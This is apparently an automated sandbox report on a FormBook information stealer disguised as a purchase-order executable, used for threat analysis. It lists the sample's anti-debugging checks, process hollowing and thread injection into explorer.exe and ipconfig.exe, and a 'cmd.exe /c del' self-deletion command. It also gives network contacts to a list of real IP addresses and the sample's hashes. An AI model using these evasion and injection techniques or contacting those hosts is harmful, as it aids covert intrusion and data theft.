Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EF6C0A mov eax, dword ptr fs:[00000030h]	5_2_02EF6C0A

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe

0_2_013ED6DE

Enables debug privileges

Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 0_2_013E605C SetUnhandledExceptionFilter,	0_2_013E605C
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 0_2_013E032D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_013E032D
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 0_2_013DD3A1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_013DD3A1

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 52.58.78.16 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 194.35.122.226 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 185.201.11.126 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 3.134.22.63 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 160.153.136.3 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 103.224.182.242 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.253.79.71 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 52.71.133.130 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 3.12.202.18 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 35.246.6.109 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 154.86.218.70 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 13.226.173.80 80	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Section loaded: unknown target: C:\Users\user\Desktop\Purchase Order 40,7045$.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Thread register set: target process: 3292			Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Thread register set: target process: 3292			Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe

Section unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: 140000

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Process created: C:\Users\user\Desktop\Purchase Order 40,7045$.exe C:\Users\user\Desktop\Purchase Order 40,7045$.exe			Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Purchase Order 40,7045$.exe'			Jump to behavior

Source: explorer.exe, 00000002.00000000.242800497.0000000001400000.00000002.00000001.sdmp, ipconfig.exe, 00000005.00000002.505838974.0000000004340000.00000002.00000001.sdmp	Binary or memory string: uProgram Manager
Source: explorer.exe, 00000002.00000000.254074114.0000000005F40000.00000004.00000001.sdmp, ipconfig.exe, 00000005.00000002.505838974.0000000004340000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000000.242800497.0000000001400000.00000002.00000001.sdmp, ipconfig.exe, 00000005.00000002.505838974.0000000004340000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000002.00000002.501463213.0000000000EB8000.00000004.00000020.sdmp	Binary or memory string: ProgmanX
Source: explorer.exe, 00000002.00000000.242800497.0000000001400000.00000002.00000001.sdmp, ipconfig.exe, 00000005.00000002.505838974.0000000004340000.00000002.00000001.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000002.00000000.258557851.0000000008ACF000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWndAj

Language, Device and Operating System Detection:

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: GetLocaleInfoA,	0_2_013EC95A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,	0_2_013E81CA
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	0_2_013E883F
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	0_2_013E8B37
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	0_2_013EC321
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	0_2_013E8B73
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	0_2_013E8A10
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,	0_2_013E5A51
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,	0_2_013EC247
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	0_2_013E7280
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	0_2_013E8AD0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,	0_2_013DECBB
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	0_2_013E873D
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	0_2_013E87E4
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_013E8648
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,	0_2_013E7EDC

Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe

Code function: 0_2_013DC26F GetSystemTimeAsFileTime,__aulldiv,

0_2_013DC26F

Stealing of Sensitive Information:

Yara detected FormBook

Source: Yara match	File source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Purchase Order 40,7045$.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Source: Yara match	File source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Purchase Order 40,7045$.exe.400000.0.raw.unpack, type: UNPACKEDPE

ID:	321097
Product:	CloudBasic
Start time:	11:05:32
Start date:	20.11.2020
Sample:	Purchase Order 40,7045$.exe
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	4142c1713da2f4f94bec71bfed46587b
SHA1:	06cc7bd53758a0936f4b674847411a4f912fd654
SHA256:	fd94ea05d07271de517e92af291ec6a8cff49cc83bb59f112efb6d5fec56809c
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Analysis Report Purchase Order 40,7045$.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs